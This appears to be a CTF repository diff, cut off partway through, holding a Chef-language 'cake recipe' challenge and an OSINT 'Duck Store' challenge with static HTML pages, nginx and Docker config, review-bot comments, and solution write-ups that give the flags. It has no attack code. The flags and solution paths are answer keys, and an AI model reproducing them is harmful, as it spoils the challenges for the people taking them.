#ifndef MIN_TOOL_VERSION_hsc2hs
#define MIN_TOOL_VERSION_hsc2hs(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 68 || \
(major1) == 0 && (major2) == 68 && (minor) <= 7)
#endif /* MIN_TOOL_VERSION_hsc2hs */
/* tool pkg-config-1.8.0 */
#ifndef TOOL_VERSION_pkg_config
#define TOOL_VERSION_pkg_config "1.8.0"
#endif /* TOOL_VERSION_pkg_config */
#ifndef MIN_TOOL_VERSION_pkg_config
#define MIN_TOOL_VERSION_pkg_config(major1,major2,minor) (\
(major1) < 1 || \
(major1) == 1 && (major2) < 8 || \
(major1) == 1 && (major2) == 8 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_pkg_config */
/* tool runghc-9.0.2 */
#ifndef TOOL_VERSION_runghc
#define TOOL_VERSION_runghc "9.0.2"
#endif /* TOOL_VERSION_runghc */
#ifndef MIN_TOOL_VERSION_runghc
#define MIN_TOOL_VERSION_runghc(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 0 || \
(major1) == 9 && (major2) == 0 && (minor) <= 2)
#endif /* MIN_TOOL_VERSION_runghc */
/* tool strip-2.38 */
#ifndef TOOL_VERSION_strip
#define TOOL_VERSION_strip "2.38"
#endif /* TOOL_VERSION_strip */
#ifndef MIN_TOOL_VERSION_strip
#define MIN_TOOL_VERSION_strip(major1,major2,minor) (\
(major1) < 2 || \
(major1) == 2 && (major2) < 38 || \
(major1) == 2 && (major2) == 38 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_strip */
#ifndef CURRENT_COMPONENT_ID
#define CURRENT_COMPONENT_ID "corrupted-encryption-0.1.0.0-inplace-corrupted-encryption"
#endif /* CURRENT_COMPONENT_ID */
#ifndef CURRENT_PACKAGE_VERSION
#define CURRENT_PACKAGE_VERSION "0.1.0.0"
#endif /* CURRENT_PACKAGE_VERSION */

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because one or more lines are too long

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -0,0 +1,6 @@
import Prelude as P
import Graphics.Image as I
image :: IO()
image = do
rawImage <- readImageExact JPG "./original.jpg"
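
Review bot: The `do` block ends on a bind (`rawImage <- readImageExact JPG "./original.jpg"`), which does not compile because the last statement of a `do` block must be an expression, and `rawImage` is never used. Either finish the file or leave it out of the commit.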

BIN
corrupted-encryption/original.jpg Executable file

Binary file not shown.

Size: 2.7 MiB

Binary file not shown.

Size: 2.5 MiB

Binary file not shown.

Binary file not shown.

Size: 9.9 MiB


@ -0,0 +1,16 @@
# Cybergrandma's cake recipe
## Text
*The year is 2077*
We were talking to our grandma about the awesome cake she used to make back
in the day when we were younger. She used to make it every christmas it was
*sooooo* good. However a couple years back she passed away, luckily modern
medicine were able to upload her into a computer. Since she can't make the
cake anymore (obviously), she sent us the recipe. I tried to make the cake
but I turned out awful. Can you figure out what is wrong with it?
## Files
cake.txt
## How to Deploy
n/a


@ -0,0 +1,13 @@
## Difficulty
easy - 100/500 punten
(Je moet gewoon de Chef compiler vinden en de file runnen)
## How To Solve
The program is written in the Chef language. All you have to do is run
it with an interpreter like [this](https://github.com/booleancoercion/rchef) one
and the flag will roll right out.
Other possible interpreters: [java interpreter](https://github.com/joostrijneveld/Chef-Interpreter)
## Flag
IGCTF{tH3_c4K3_1S_a_L1E}
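
Review bot: The Difficulty section is in Dutch (`easy - 100/500 punten` and the parenthesised line below it) while the rest of the writeups are in English; translate it, for example "easy, 100/500 points (you only need to find a Chef interpreter and run the file)". The second interpreter link can be folded into the sentence that introduces the first one.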


@ -0,0 +1,100 @@
Tasty cake with chocolate sauce and sprinkles.
This tasty cake with chocolate sauce and sprinkles is a little
harder to make than regular cake or cake with icing,
but I think it is a lot better. The effort
really pays off in the end. Perfect as a dessert for your family :)
Ingredients.
70 g flour
67 g chocolate chips
2 eggs
80 ml beaten eggs
70 g butter
113 g yeast
70 g sugar
3 g baking soda
125 g cacao powder
120 ml hot water
0 g cake mixture
1 pinch salt
Method.
Put butter into mixing bowl.
Add eggs to mixing bowl.
Put yeast into mixing bowl.
Add baking soda to mixing bowl.
Put hot water into mixing bowl.
Add baking soda to mixing bowl.
Put sugar into mixing bowl.
Put beaten eggs into mixing bowl.
Add salt to mixing bowl.
Add baking soda to mixing bowl.
Put chocolate chips into mixing bowl.
Put butter into mixing bowl.
Add salt to mixing bowl.
Put flour into mixing bowl.
Add baking soda to mixing bowl.
Liquefy contents of the mixing bowl.
Liquefy contents of the mixing bowl.
Pour contents of the mixing bowl into the 1st baking dish.
Bake the cake mixture.
Wait until baked.
Serve with chocolate sauce.
Chocolate sauce.
Ingredients.
100 g cacao powder
95 g sugar
51 ml milk
1 pinch salt
75 g chocolate chips
2 pinches baking powder
12 g vanilla
pot
Method.
Clean mixing bowl.
Put sugar into mixing bowl.
Fold pot into mixing bowl.
Put pot into mixing bowl.
Put pot into mixing bowl.
Add baking powder to mixing bowl.
Put pot into mixing bowl.
Put sugar into mixing bowl.
Remove vanilla from mixing bowl.
Put milk into mixing bowl.
Remove baking powder from mixing bowl.
Put sugar into mixing bowl.
Put milk into mixing bowl.
Put chocolate chips into mixing bowl.
Put milk into mixing bowl.
Add salt to mixing bowl.
Put cacao powder into mixing bowl.
Remove salt from mixing bowl.
Put sugar into mixing bowl.
Put milk into mixing bowl.
Liquefy contents of the mixing bowl.
Pour contents of the mixing bowl into the 2nd baking dish.
Serve with sprinkles.
Sprinkles.
Ingredients.
76 g sugar
49 ml water
7 ml excess water
125 g brown sugar
Method.
Clean mixing bowl.
Put brown sugar into mixing bowl.
Put sugar into mixing bowl.
Remove excess water from mixing bowl.
Put water into mixing bowl.
Put sugar into mixing bowl.
Liquefy contents of the mixing bowl.
Pour contents of the mixing bowl into the 3rd baking dish.
Serves 3.


@ -0,0 +1,18 @@
# Physical instructions
WARNING THIS FILE CONTAINS (a part of) THE SOLUTION TO THE CHALLENGE.
## Choose a location for the QR code
The goal of the (virtual) part of the challenge is to find a certain Twitter account.
This Twitter account `@duck_lover_111` should then contain a tweet with a picture of the location of a QR code.
The PDF document with the QR code that should be placed in this location is provided (`qrcode.pdf`).
Steps you need to take in order to hide the flag:
1. Print the PDF document containing the QR code.
1. Place the document somewhere in an accessible location on the campus. (make sure the location is easy to find for non-VUB students as well.)
1. Take a picture at the location (but don't show the QR code in the image, of course)
1. Tweet the picture with optionally a caption from the `@duck_lover_111` account. You can also geotag the tweet to make it easier to solve. (The main challenge is finding the twitter account.)
## Twitter account credentials
Ask Seppe

16
duck-store/README.md Normal file
View File

@ -0,0 +1,16 @@
# Duck Store
## Text
I've been looking online for some shops that sell rubber ducks.
This shop seems okay, can you check if they're legit?
## Files
None, just the URL of the challenge
## How to deploy
### Virtual part
Run the challenge using the provided docker compose file in `src/`.
### Physical part
A part of this challenge involves scanning a QR Code, placed somewhere on the campus.
To avoid spoilers if you're solving this challenge at a later date, instructions can be found in `PHYSICAL_INSTRUCTIONS.md`.

24
duck-store/SOLUTION.md Normal file
View File

@ -0,0 +1,24 @@
# Difficulty
Medium
# How to solve
The website links to the Twitter account of the shop in multiple locations. (The footer, the about page, ...)
When you visit [this Twitter account](https://twitter.com/TheIGDuckStore) `@TheIGDuckStore`, you need to investigate some of the tweets.
There are two tweets, [first](https://twitter.com/TheIGDuckStore/status/1592953206707195905) and [second](https://twitter.com/TheIGDuckStore/status/1592953377436360705) which are liked by the `@duck_lover_111` account.
The second tweet also has just one reply from this account.
This account contains a tweet with a picture of the physical location of the flag.
A QR Code at this location will contain the flag.
# Hints
## Hint #1
Why do all these brands need to have a social media presence these days? Back in my day, ...
## Hint #2
Maybe doing some background checks on the store's customers can help you.
# Flag
`IGCTF{Secr3t-Of-The-Ducks!}`
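Review bot: The "How to solve" steps depend entirely on live third-party state (the two linked tweets, the likes from `@duck_lover_111` and that account's reply), so the write-up stops being reproducible as soon as any of those are removed or hidden. Consider committing screenshots or archived copies next to this file. Minor style point: every heading here is a top-level `#`, while the README in the same folder uses a `#` title with `##` sections.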

BIN
duck-store/qrcode.pdf Normal file

Binary file not shown.

View File

@ -0,0 +1,6 @@
FROM nginx
RUN rm /etc/nginx/nginx.conf /etc/nginx/conf.d/default.conf
COPY ./src/content /usr/share/nginx/html
COPY ./src/conf /etc/nginx
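Review bot: `FROM nginx` on the first line is unpinned, so a rebuild after the event pulls whatever `latest` is at that time and may not match the nginx this config was tested against; pin a specific tag or digest. Also check the build context: both `COPY ./src/...` lines assume the context is the directory above `src/`, while the README says the compose file lives in `src/` and the compose file uses `build: .`. If the Dockerfile and compose file sit together in `src/`, these paths will not resolve.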

View File

@ -0,0 +1,6 @@
version: '3.9'
services:
duck-store:
build: .
ports:
- 80:80
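Review bot: `80:80` under `ports` publishes the challenge on every interface of the host and needs a privileged host port; for local runs something like `127.0.0.1:8080:80` is safer, with the public mapping left to the deployment host. The top-level `version: '3.9'` key is treated as obsolete by current Docker Compose and can be dropped.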

View File

@ -0,0 +1,26 @@
events {}
http {
server {
listen 80;
listen [::]:80;
server_name localhost;
location ~ ^/(flag|flag.txt)[/]? {
return 302 https://bit.ly/3SxEjGF;
}
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}
}
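Review bot: The pattern in `location ~ ^/(flag|flag.txt)[/]? {` is not anchored at the end and leaves the `.` unescaped, so it matches every URI that merely starts with `/flag` (for example `/flags.html`), and the `flag.txt` alternative never adds anything over `flag`. If the intent is to catch only `/flag` and `/flag.txt`, use `location ~ ^/flag(\.txt)?/?$`. The `return 302 https://bit.ly/3SxEjGF;` target is an opaque short link; put the final URL in the config, or add a comment saying where it leads, so the redirect can be reviewed.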

View File

@ -0,0 +1,106 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>About</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link active" aria-current="page"
>About</a
>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="container py-3">
<main>
<h1>About us</h1>
<p>
Founded in 1981, The Duck Store™ has decades of experience in the
production and distribution of rubber ducks.
</p>
<p>
We offer only the highest quality rubber ducks, using advanced
technologies that extend the lifespan of our ducks.
</p>
<p>
We have received the Rubber Duck Durability Award (RDDA) 75 times, and
we are a member organisation of the Rubber Duck Vendor Association
(RDVA).
</p>
<p>
For more information on new ducks, follow us on Twitter.
</p>
</main>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>
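Review bot: SOLUTION.md says the about page links to the Twitter account, but in `<main>` the sentence "For more information on new ducks, follow us on Twitter." is plain text and the only link is the footer icon. Wrap "Twitter" in an anchor to `https://twitter.com/theigduckstore` so the page matches the write-up. The footer anchor contains only an `<svg>` and has no accessible name; add an `aria-label`. The logo `<img>` in the header is also missing an `alt` attribute.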


View File

@ -0,0 +1,180 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Our Ducks</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™©</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link active" aria-current="page"
>Ducks</a
>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<main>
<section class="py-5 text-center container">
<div class="row py-lg-5">
<div class="col-lg-6 col-md-8 mx-auto">
<h1 class="fw-light">Our ducks</h1>
<p class="lead text-muted">
Discover our range of rubber ducks. We have ducks for winter,
autumn, summer and spring. No matter what time of year, there will
always be a duck that fits right in.
</p>
<p>
<a href="#ducks" class="btn btn-primary my-2"
>Discover our ducks</a
>
</p>
</div>
</div>
</section>
<div class="album py-5 bg-light" id="ducks">
<div class="container">
<div class="row row-cols-1 row-cols-sm-2 row-cols-md-3 g-3">
<div class="col">
<div class="card shadow-sm">
<img class="bd-placeholder-img card-img-top" src="ducks.png" />
<div class="card-body">
<p class="card-text">
No matter what time of year, these timeless ducks can be
used for any ocassion.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€5/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img
class="bd-placeholder-img card-img-top"
src="holiday.png"
/>
<div class="card-body">
<p class="card-text">
Still looking for the perfect holiday gift? Our festive
ducks are now available.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€10/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img
class="bd-placeholder-img card-img-top"
src="newyear.png"
/>
<div class="card-body">
<p class="card-text">
Get ready for 2023 with our new year themed ducks.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€12.95/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img
class="bd-placeholder-img card-img-top"
src="birthday.png"
/>
<div class="card-body">
<p class="card-text">
Someone's birthday? Use our birthday themed ducks to
celebrate.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€9.55/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img class="bd-placeholder-img card-img-top" src="batman.png" />
<div class="card-body">
<p class="card-text">
Explore our line of superhero themed ducks.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€25.95/duck</small>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</main>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>
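Review bot: This page has no `<footer>` block, so it is the one page in the site without the Twitter link that the challenge path relies on; copy the footer and the hidden `twitter` symbol from the other pages. The header brand reads `The Duck Store™©` here but `The Duck Store™` everywhere else, "ocassion" in the first card should be "occasion", and none of the product `<img>` tags has an `alt` attribute.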


View File

@ -0,0 +1,112 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>FAQ</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item">
<a href="faq.html" class="nav-link active" aria-current="page"
>FAQs</a
>
</li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="container py-3">
<main>
<h1>Are ducks from The Duck Store™ safe to use?</h1>
<p class="fs-5 col-md-8">
Our ducks adhere to the highest safety standards and are tested weekly
for hazardous chemical materials.
</p>
<h1>Are the water resistant ducks available yet?</h1>
<p class="fs-5 col-md-8">
Due to the incredible demand for our new water resistant ducks, we
don't currently have an estimate on when these ducks will be available
for purchase. Please keep an eye on our Twitter for more information.
</p>
<h1>How long do your ducks last?</h1>
<p class="fs-5 col-md-8">
Our ducks have an average lifespan of 10 years.
</p>
<h1>
What is your response to the recent allegations that ducks contain
materials dangerous for humans?
</h1>
<p class="fs-5 col-md-8">No comment.</p>
</main>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>
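Review bot: Each of the four questions in `<main>` is marked up as its own `<h1>`, which leaves the page with four top-level headings and no page title; use a single `<h1>` for the page and `<h2>` for the questions. The answer that says "Please keep an eye on our Twitter" is another place where the account is mentioned without being linked.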


View File

@ -0,0 +1,257 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>The Duck Store™</title>
<link rel="icon" href="favicon.ico" />
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
<style>
.feature-icon {
width: 4rem;
height: 4rem;
border-radius: 0.75rem;
}
</style>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link active" aria-current="page"
>Home</a
>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="px-4 py-5 my-5 text-center">
<img
class="d-block mx-auto mb-4"
src="rubber-duck-large.png"
alt=""
width="72"
/>
<h1 class="display-5 fw-bold">Belgium's largest duck store</h1>
<div class="col-lg-6 mx-auto">
<p class="lead mb-4">
Buy your ducks at The Duck Store™, Belgium's largest duck store. We
only sell the finest rubber ducks, handcrafted by our staff. By using
advanced technologies, we're pushing the boundaries of what a rubber
duck can be.
</p>
<div class="d-grid gap-2 d-sm-flex justify-content-sm-center">
<a href="ducks.html"
><button type="button" class="btn btn-primary btn-lg px-4 gap-3">
Ducks
</button></a
>
<a href="pricing.html"
><button
type="button"
class="btn btn-outline-secondary btn-lg px-4"
>
Pricing
</button></a
>
</div>
</div>
</div>
<div class="container px-4 py-5" id="featured-3">
<div class="row g-4 py-5 row-cols-1 row-cols-lg-3">
<div class="feature col">
<div
class="feature-icon d-inline-flex align-items-center justify-content-center text-bg-primary bg-gradient fs-2 mb-3"
>
<svg class="bi" width="1em" height="1em">
<use xlink:href="#star" />
</svg>
</div>
<h3 class="fs-2">Handcrafted quality</h3>
<p>
Every duck we sell has been handcrafted by a staff member. We take
the time to make sure that every duck has their own name and
backstory.
</p>
<a
href="ducks.html"
class="icon-link d-inline-flex align-items-center"
>
Discover our ducks
<svg class="bi" width="1em" height="1em">
<use xlink:href="#chevron-right" />
</svg>
</a>
</div>
<div class="feature col">
<div
class="feature-icon d-inline-flex align-items-center justify-content-center text-bg-primary bg-gradient fs-2 mb-3"
>
<svg class="bi" width="1em" height="1em">
<use xlink:href="#time" />
</svg>
</div>
<h3 class="fs-2">Durable</h3>
<p>
Our rubber ducks have been awarded the Rubber Duck Durability Award
(RDDA) by the Rubber Duck Vendor Association (RDVA). Using
groundbreaking technologies, we're making sure that our ducks last
even longer.
</p>
<a
href="about.html"
class="icon-link d-inline-flex align-items-center"
>
About us
<svg class="bi" width="1em" height="1em">
<use xlink:href="#chevron-right" />
</svg>
</a>
</div>
<div class="feature col">
<div
class="feature-icon d-inline-flex align-items-center justify-content-center text-bg-primary bg-gradient fs-2 mb-3"
>
<svg class="bi" width="1em" height="1em">
<use xlink:href="#money" />
</svg>
</div>
<h3 class="fs-2">Fair pricing</h3>
<p>
Ducks should be available for everyone, that's why we offer
competitive pricing and bulk discounts. You can get a duck for as
low as €5! But if you buy 1000 ducks, you can enjoy a 10% discount!
</p>
<a
href="pricing.html"
class="icon-link d-inline-flex align-items-center"
>
Pricing
<svg class="bi" width="1em" height="1em">
<use xlink:href="#chevron-right" />
</svg>
</a>
</div>
</div>
</div>
<div class="container marketing">
<hr class="featurette-divider" />
<div class="row featurette">
<div class="col-md-7">
<h2 class="featurette-heading fw-normal lh-1">
Introducing our first water resistant ducks.<br /><span
class="text-muted"
>Now that's innovation.</span
>
</h2>
<p class="lead">
We're exicted to introduce our newest line of water resistant rubber
ducks. After decades of extensive research and development, our
first line of water resistant ducks are now available. The same
ducks you know and love, but now ready to endure even the harshest
environmental conditions.
</p>
</div>
<div class="col-md-5">
<img
src="big-duck.png"
class="bd-placeholder-img bd-placeholder-img-lg featurette-image img-fluid mx-auto"
width="500"
/>
</div>
</div>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
<symbol id="star" viewBox="0 0 16 16">
<path
d="M3.612 15.443c-.386.198-.824-.149-.746-.592l.83-4.73L.173 6.765c-.329-.314-.158-.888.283-.95l4.898-.696L7.538.792c.197-.39.73-.39.927 0l2.184 4.327 4.898.696c.441.062.612.636.282.95l-3.522 3.356.83 4.73c.078.443-.36.79-.746.592L8 13.187l-4.389 2.256z"
fill="#ffffff"
/>
</symbol>
<symbol id="time" viewBox="0 0 16 16">
<path
d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM8 3.5a.5.5 0 0 0-1 0V9a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 8.71V3.5z"
fill="#ffffff"
/>
</symbol>
<symbol id="money" viewBox="0 0 16 16">
<path d="M8 10a2 2 0 1 0 0-4 2 2 0 0 0 0 4z" fill="#ffffff" />
<path
d="M0 4a1 1 0 0 1 1-1h14a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H1a1 1 0 0 1-1-1V4zm3 0a2 2 0 0 1-2 2v4a2 2 0 0 1 2 2h10a2 2 0 0 1 2-2V6a2 2 0 0 1-2-2H3z"
fill="#ffffff"
/>
</symbol>
<symbol id="chevron-right" viewBox="0 0 16 16">
<path
fill-rule="evenodd"
d="M4.646 1.646a.5.5 0 0 1 .708 0l6 6a.5.5 0 0 1 0 .708l-6 6a.5.5 0 0 1-.708-.708L10.293 8 4.646 2.354a.5.5 0 0 1 0-.708z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>
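Review bot: Both call-to-action links in the hero section nest a `<button>` inside an `<a>` (`<a href="ducks.html"><button type="button" ...>`), which is invalid HTML because interactive elements may not be nested; put the `btn` classes directly on the `<a>` and drop the `<button>`. In the featurette, "exicted" should be "excited", and the text says the water resistant ducks "are now available" while faq.html says there is no estimate for when they can be purchased. If that contradiction is not a deliberate part of the challenge, align the two pages.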


View File

@ -0,0 +1,267 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Pricing</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
